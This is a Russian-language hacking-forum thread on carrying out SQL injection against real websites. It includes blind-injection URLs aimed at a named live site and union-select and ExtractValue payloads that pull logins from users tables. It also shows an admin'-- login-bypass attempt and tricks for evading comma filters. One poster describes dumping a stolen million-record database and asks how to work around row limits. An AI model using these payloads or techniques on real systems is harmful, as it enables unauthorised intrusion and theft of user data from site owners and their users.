подскажите плз как вскрывать такую защиту? есть сайт http://www.earthcharter.ru/index.php?cnt=86 Я узнал, что там версия мускуля пятая http://www.earthcharter.ru/index.php?cnt=86+and+1=if%28substring%28version%28%29,1,1%29=5,1,2%29 но при попытке http://www.earthcharter.ru/index.php?cnt=86+order+by+1 выдается ошибка. как ее обойти?
Там Blind. Version: 5 DB: ecologyand_chart Table Name: textarray Table Name: textes И т.д. P.S А учитывая, что тИЦ: 20, и PR: 5, только зря потратишь время.
Учат синтаксис, тип запросов, функции MySQL- dev.mysql.com. А не статьи по использованию SQL-инъекций.
ну вот это объясните пожалуйста 86)and(1=0) по идеи, если 1=0 должен false возвращаться и вообще ничего не должно выводиться?
Подскажите, пожалуйста, как решается эта проблема? Запрос вида версия БД 4.1.12-standard-log, поэтому решил так извратиться версию узнавал таким образом если hex() не писать, то вылазит ошибка, которая в самом начале поста
Да когда одна переменная, понятно, что ее мона захексить и разхексить. а что делать при таком формате запроса? -1'+union+select+*+from+(select+1,2,3,4,5,6)a, users,(select+1,2,3,4,5,6,7,8)b+--+
в чем трабла ? ошибка в поле логин, все время пишет Message: MySQL Query fail: SELECT user_pass, user_salt, user_groupid, user_id FROM `users` WHERE user_name = ''--' MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 пробовал зайти как админ прописав в логине admin'-- , но никак.. пробовал group и order писать , тоже ноль . через union не получается
Re: 4.3 Проблемы с кодировками Есть еще функция binary() которая выводит все как есть. И никаких проблем с кодировкой. SELECT binary(user()) FROM mysql.user И никаких unhex(hex()) не требуется. Проверено временем и дорогами.
Подскажите пожалуйста как в concat запихать insert, да так, чтобы пробелы были заменены чем либо. Вот как делается select (спасибо M_Script): Code: (ExtractValue(1,concat(0x3a,(select(login)from(users)where(id=1)))))='1
чтобы зайти под логином admin - нужно чтобы на этом сайте был логин admin понимаешь? он может быть сидеть не под ником admin, и вписавши его настоящий ник с правами админа - вот тогда все получиться. А так БД не понимает, что ты от нее хочешь. Также в ошибке можно найти названия таблицы, иногда с ником админа. Скачай движ данного сайты, и на локалхосте потренеруйся. Установи БД, полазь как админ, придумай логин себе и пасс, и обойди же его.
Есть вопрос! Давно не занимался такими делами и уже забыл) Недавно нашел скулю на сайте, база 1 мил. Подметил прогу запустил на внс и жду ) прошло несколько времени я решил проверить как там моя база) оказалось что какая то ошибка, 47 тыс. уже скачало, а вот дальше ошибка, я думал прикрыли скуль но смотрю она есть, начал тестить оказалось что нужно разбивать лимит. 153,1 306,2 612,3 ... иначе не хочет. Иинтересно тот факт что если делать как я прежний раз скачал то уже так не работает доходит до 153 (. Что можете посоветовать? я вижу вариант переделать скрипт чтоб качал базу по пакетно!
Апну пожалуй, я тут составил некоторый список ошибок, которые выплевываются в том случае, когда возможно провести инъекцию. Некоторые из них распостранены, а некоторые весьма специфичны: Code: [B][COLOR=SandyBrown]You have an error in your SQL syntax Пустая страница (вероятность 50%) Warning: mysql_num_rows() Warning: mysql_fetch_array() Warning: mysql_fetch_assoc() Warning: mysql_fetch_object() Warning: extract() [function.extract] Could not execute query DataBase Error!!! A error occured: Line 1: Incorrect syntax near 'value'' Error SQL Query Error TERM doesn't exist in dbase Маскировка под запятую (,) Маскировка под число или слово (193 or slave) Специфическая ошибка на определенном языке (напрямую или косвенно связана с предыдущими случаями)[/COLOR][/B] и тд.
Уважаемые, подскажите по одному вопросу, а то всю голову сломал. Есть инъекция на одном сайте, однако из-за неких правил обработки переменных, не получается провести полноценную инъекцию. Проблема вот в чем: Уязвимая переменная: ?var=(123,456) вот данные внутри ни как не проверяются, однако в скрипте данные парсятся либо через explode либо регуляркой, и возникает проблема в том, что если я буду писать что-то типа union select all 1,2,3... Все что после первой запятой обрежется. Ну т.е. из переменной ?var=(123,456) union select all 1,2,3..%23) в запрос попадет 456) union select all 1 , что по понятной причине не дает возможность проэксплуатировать скулю. Каким образом можно просунуть поля без использования запятых? P.S. через %2C пробовал, тот же эффект. Количество полей узнал, union срабатывает, осталось дело за малым, подставить ему эти поля и дело в шляпе.
